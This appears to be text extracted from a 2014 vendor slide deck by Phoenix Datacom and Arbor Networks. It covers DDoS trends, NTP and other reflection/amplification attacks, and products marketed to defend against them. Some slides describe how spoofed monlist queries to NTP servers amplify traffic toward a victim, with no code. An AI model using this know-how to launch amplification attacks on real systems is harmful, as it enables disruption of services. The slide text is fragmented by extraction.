Protection from DDoS attack is now your responsibility, but help is at hand Mark Tilston, Senior Cyber-Security Engineer PHOENIX DATACOM 2 nd December 2014 Welcome www.phoenixdatacom.com
Phoenix Datacom, our core competencies Now in our 30 th year, Phoenix Datacom is the UK’s most technically competent provider of solutions and professional services to enhance the performance & security of cloud, physical and virtual networks. We serve customers in : Finance | Enterprises | Government/Defence | Carriers | Mobile Operators Network Data Access for Test, Monitoring & Load Balancing Solutions | Support | Professional Services Phoenix Datacom, our core competencies Locating just the data you need in order to see further return from your security and monitoring investments Application Performance Monitoring & Improvement Resolving bottlenecks and other issues before they affect the performance of applications and staff productivity Cyber-Security Protection & Testing Protecting your critical infrastructure from the threats of cyber-crime whilst saving you significant time and money Network Performance Testing & Validation Helping you to build, test, validate and monitor your business-critical cloud, physical and virtual networks Solutions to enhance the performance & security of your networks & applications
Solution demonstrations available in our…. Solutions to enhance the performance & security of your networks & applications
Phoenix Datacom, core security solutions – Monitoring / Mediation / Remediation Remote Internet/ Worker WAN Hacker/ Intruder Perimeter Firewall: Standard FW rules x Next-Generation Firewall for Application Control 1 2 Next-Generation Intrusion Detection and Protection x Zero-Day Malware & APT Execution 3 x 4 DDoS Protection, Prevention and Mitigation x Network, LAN and Computer Forensics 5 6 Threat Vulnerability Management & Assessment Advanced Network & DC Cloaking 7 - 8 Stateful Attack Generation Site CFO CEO CISO HR Department Remote worker Finance HR Legal Exchange Intranet hot-desking Example Hosts Application Servers (on-site and in the Cloud) Solutions to enhance the performance & security of your networks & applications
Phoenix Datacom, core security solutions – Our focus today Remote Internet/ Worker WAN Hacker/ Intruder Perimeter Firewall: Standard FW rules DDoS Protection, Stateful Attack Prevention and Generation Mitigation Site CFO CEO CISO HR Department Remote worker Finance HR Legal Exchange Intranet hot-desking Example Hosts Application Servers (on-site and in the Cloud) Solutions to enhance the performance & security of your networks & applications
The focus here today… Agenda: • The latest DDoS attack threat spectrum targeting Enterprises, the Government and Financial Organisations – Arbor Networks • How local DDoS protection combined with Carrier protection provides the most effective incident response and remediation - Arbor Networks • The importance of knowing the capability of your DDoS Mitigation measures, as well as new solutions under consideration – Ixia (BreakingPoint) • A live demo of DDoS attacks against the Arbor Networks DDoS Mitigation solution for Enterprises, the Government and Financial Organisations - Phoenix Datacom. Solutions to enhance the performance & security of your networks & applications
Better Protection from Cyber-Threats Darren Anstee, Director of Solution Architects ARBOR NETWORKS Solutions to enhance the performance & security of your networks & applications
Threats in the news… Cost Disruption Loss of Customer Trust Solutions to enhance the performance & security of your networks & applications
The threat space is complex… Advanced Threat Continuum New Advanced Threat Landscape Availability Integrity Confidentiality Quiet & Patient Loud & Noisy Solutions to enhance the performance & security of your networks & applications
DDoS evolution Peak Monthly Gbps of Attacks 350 325.05 300 264.61 250 200 150 100 50 0 July October July October July October July October January July January April January April January April January April April Period Average Attack % Change Peak Attack Size % Change size (bps) (bps) Q1 1.12Gbps - 325.06Gbps - Q2 759.83Mbps -32.2% 154.69Gbps -52.4% Q3 858.98Mbps +13.05% 264.61Gbps +71.1% Solutions to enhance the performance & security of your networks & applications
2014, a time for reflection… Solutions to enhance the performance & security of your networks & applications
Characteristics of an NTP Reflection/Amplification Attack Abusable Internet accessible Servers, Routers, Home CPE devices, etc . NTP Servers Solutions to enhance the performance & security of your networks & applications
Characteristics of an NTP Reflection/Amplification Attack Abusable NTP Servers Attacker sends monlist , showpeers , or other NTP level-6/-7 administrative queries with target port and spoofed IP address of target Solutions to enhance the performance & security of your networks & applications
Characteristics of an NTP Reflection/Amplification Attack Abusable NTP Servers NTP services ‘reply’ to the attack target with streams of ~468-byte packets sourced from UDP/123 to the` target; the destination port is the source port the attacker Target Port: chose while generating the NTP queries UDP/80 Or UDP/123 Solutions to enhance the performance & security of your networks & applications
2014 ATLAS Initiative : Anonymous Stats, World-Wide Other Protocols for Amplification, Q3 • Lower proportion of events for SNMP reflection this quarter compared to last. Chargen grows • Given the huge storm of NTP reflection activity, there slightly. has been some focus on other protocols that can be • Significant growth in attacks with source port used in this way. 1900 (SSDP) • Looking at attacks with source-ports of services used • Almost no attacks in Q2 for reflection. • 29506 in Q3 • DNS has been used by attackers for several years. Protocol UDP Source Percentage Max Size Average Port of Attacks Q3 Size in Q3 Q3 SNMP 161 0.03% 14.46Gbps 856Mbps Chargen 19 2% 24.8Gbps 1.05Gbps DNS 53 4% 83.9Gbps 1.7Gbps SSDP 1900 4% 124Gbps 4.04Gbps NTP 123 5% 156.3Gbps 2.99Gbps Solutions to enhance the performance & security of your networks & applications
DDoS Evolution Solutions to enhance the performance & security of your networks & applications
Confidentiality / Integrity Threats Huge number of ‘ways in’ Many Threat Vectors – Drive By Download • New AND Old – SPAM/Phishing • IPS / AV Limited coverage • – Watering Hole Patching lag – Walk-in, USB Threats On Corporate Network 60 Leveraging vulnerabilities in: 50 – JavaScript 40 – Java applets 30 – Compound Documents 20 – Anything Adobe 10 0 Advanced Botted or Under-capacity Industrial Malicious Insider Other Persistent Threat Compromised for bandwidth Espionage Hosts Solutions to enhance the performance & security of your networks & applications
What does Java script obfuscation look like? Solutions to enhance the performance & security of your networks & applications
And in the real world… Solutions to enhance the performance & security of your networks & applications
Bot builder with anti-detection Solutions to enhance the performance & security of your networks & applications
So, how do organisations improve defenses? Actionable Threat Intelligence Use the expertise within vendors, integrators to maximise your own effectiveness Ensure Availability Many organisations are now reliant on the Internet for their business continuity Broad & Deep Visibility Identify suspicious or malicious activities wherever they occur. Packet capture at key network locations to monitor critical assets Workflow Solutions that fit into an IR workflow and enable personnel and processes. Solutions to enhance the performance & security of your networks & applications
Actionable Threat Intelligence ATLAS Security Honeypots & Community SPAM Traps 300K Malware samples/day Sandbox of Virtual Machines run malware (look for botnet C&C, files, network behavior) DDoS Millions of Family Samples AIF Policy Report and PCAP “Tracker” DDoS Attack stored in database Auto-classification and analysis every 24 hrs Solutions to enhance the performance & security of your networks & applications
Ensure Availability Pravail Availability Protection System (APS) Global Internet Immediate protection from current Threats threats. Utilise ATLAS threat intelligence to - protect your organisation from the Global Network latest threats. Easy to install and deploy Easy to operationalize and deploy. - Built in bypass functionality. Detailed Servers traffic and reporting for advanced users. Enterprise (Arbor) Cloud Signaling Perimeter Integration with cloud based DDoS - protection services to provide the Files, Act automated, layered protection Packets & Flow necessary to deal with multi-vector Internal Network attacks. Files, Understand Packets & Flow Enterprise Assets Identify Solutions to enhance the performance & security of your networks & applications
Recommend
More recommend